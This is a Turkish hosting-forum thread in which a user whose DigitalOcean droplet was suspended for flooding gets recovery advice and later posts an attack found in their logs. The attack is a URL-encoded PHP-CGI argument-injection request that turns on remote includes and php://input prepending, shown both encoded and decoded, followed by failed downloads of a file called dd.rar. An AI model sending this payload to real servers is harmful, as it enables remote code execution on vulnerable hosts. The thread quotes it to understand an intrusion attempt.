Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox
Digitalocean Ddos Veya Flood Tan Serverı Kapatmış!
Digitalocean Ddos Veya Flood Tan Serverı Kapatmış!
-
by_Tet bunu yazdı
Hocam yorumun için teşekkürler kodlarımı da gözden geçiremiyorum ki komple kapatmışlar bi şekilde yedek almam gerekli
İki dk dosyalarıma erişim izni versinler sonra komple kapatsınlar önemli değil orası yani
Eğer yarın sabaha kadar cevap atmazlarsa dediğini tekrar göndereceğim
hocam şurada (https://www.digitalocean.com/community/tutorials/how-to-recover-from-a-compromised-droplet-sending-an-outgoing-flood-or-ddos) yazana göre DigOcean daki control panel deki console dan server ına erişebiliyorsun sanırım. root pass bilmen yeterli diyor.
-
Lightsaber bunu yazdı
hoca güzel bi şekilde yaz, kibarca, biraz da yağ çek hemen kıvama geliyorlar :D bu şekilde fazladan kupon kodu kapmıştım bir de borç sildirmiştim :D
İşin açığı
i have my mysql backup. can u open recovery mode now
Dediğime cevap atmışlar 20 dk sonra yani şimdi recovery modu açmışlar :D Ayıp olmasın diye RockZs hocamın yazdığı şeyi biraz kısaltarak yazdım teşekkür olsun diye
Bi verilerimi kurtarıyım sonrasında..... :) köprüyü geçene kadar yani
-
RockZs bunu yazdıby_Tet bunu yazdı
Hocam yorumun için teşekkürler kodlarımı da gözden geçiremiyorum ki komple kapatmışlar bi şekilde yedek almam gerekli
İki dk dosyalarıma erişim izni versinler sonra komple kapatsınlar önemli değil orası yani
Eğer yarın sabaha kadar cevap atmazlarsa dediğini tekrar göndereceğim
hocam şurada (https://www.digitalocean.com/community/tutorials/how-to-recover-from-a-compromised-droplet-sending-an-outgoing-flood-or-ddos) yazana göre DigOcean daki control panel deki console dan server ına erişebiliyorsun sanırım. root pass bilmen yeterli diyor.
Hocam işte konsola ulaşabiliyordum fakat step 2 yu uygulayamıyordum şimdi açmışlar yedek alacağım tekrar teşekkür ederim
Eğer yine kurtaramazsam mecburen konuyu uplarım fakat çözüldü gibi herkese teşekkürler :)
-
şifreyi basit bir şey yaptığından bahsetmişsin.
do serverları tahminimce sürekli saldırıyo alıyor.
1- hiçbir programı default port kullanma :)
2- basit şifre kullanma
droplet'ine biri girip bot salmış olabilir içine
ben bi ara farkında olmadan mail sunucusu kurmuşum başka bişey kurarken
adamın teki benim sunucu üzerinden spam mail yolladı diye abuse yemiştim :)
-
Daft bunu yazdı
şifreyi basit bir şey yaptığından bahsetmişsin.
do serverları tahminimce sürekli saldırıyo alıyor.
1- hiçbir programı default port kullanma :)
2- basit şifre kullanma
droplet'ine biri girip bot salmış olabilir içine
ben bi ara farkında olmadan mail sunucusu kurmuşum başka bişey kurarken
adamın teki benim sunucu üzerinden spam mail yolladı diye abuse yemiştim :)
Olayı çözdüm götün teki şöyle POST göndermiş
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
Decode şu şekilde
//cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n
Sonra dd.rar indirmeye çalışmışlar tabi 404 vermiş çünkü sistem node.js php'ye dair hiçbirşey yok
[0mGET /dd.rar [33m404 [0m5.021 ms - 1271[0m [0mGET /dd.rar [33m404 [0m8.373 ms - 1271[0m [0mGET /dd.rar [33m404 [0m5.843 ms - 1271[0m [0mGET /dd.rar [33m404 [0m16.520 ms - 1271[0m [0mGET /dd.rar [33m404 [0m8.180 ms - 1271[0m [0mGET /dd.rar [33m404 [0m14.779 ms - 1271[0m [0mGET /dd.rar [33m404 [0m8.361 ms - 1271[0m [0mGET /dd.rar [33m404 [0m4.473 ms - 1271[0m [0mGET /dd.rar [33m404 [0m3.782 ms - 1271[0m [0mGET /dd.rar [33m404 [0m17.023 ms - 1271[0m [0mGET /dd.rar [33m404 [0m3.852 ms - 1271[0m [0mGET /dd.rar [33m404 [0m44.379 ms - 1271[0m [0mGET /dd.rar [33m404 [0m23.454 ms - 1271[0m [0mGET /dd.rar [33m404 [0m8.575 ms - 1271[0m
Haliyle benim dropleti kapatmışlar ama benim bi suçum yok ne yani böyle saldırılar aldığımda kapatacaklar mı sonuçta zarar vermesi imkansız en azından php olarak.
-
hacı vps'i korumak senin görevin :D
host değil ki bu
gerçi, dedicated almadığın sürece her türlü karışıyolar gene ota buka
-
Daft bunu yazdı
hacı vps'i korumak senin görevin :D
host değil ki bu
gerçi, dedicated almadığın sürece her türlü karışıyolar gene ota buka
Doğru diyon hocam artık tıngır mıngır düşe kalka öğrenecez yapacak bişey yok
Yazdığım sistemde 0 açık ona eminim (hatasız kod olmaz lafı biryana bırakılırsa) ama vps korumak bambaşka bişeymiş dediğin gibi. neyse öğreniriz artık :)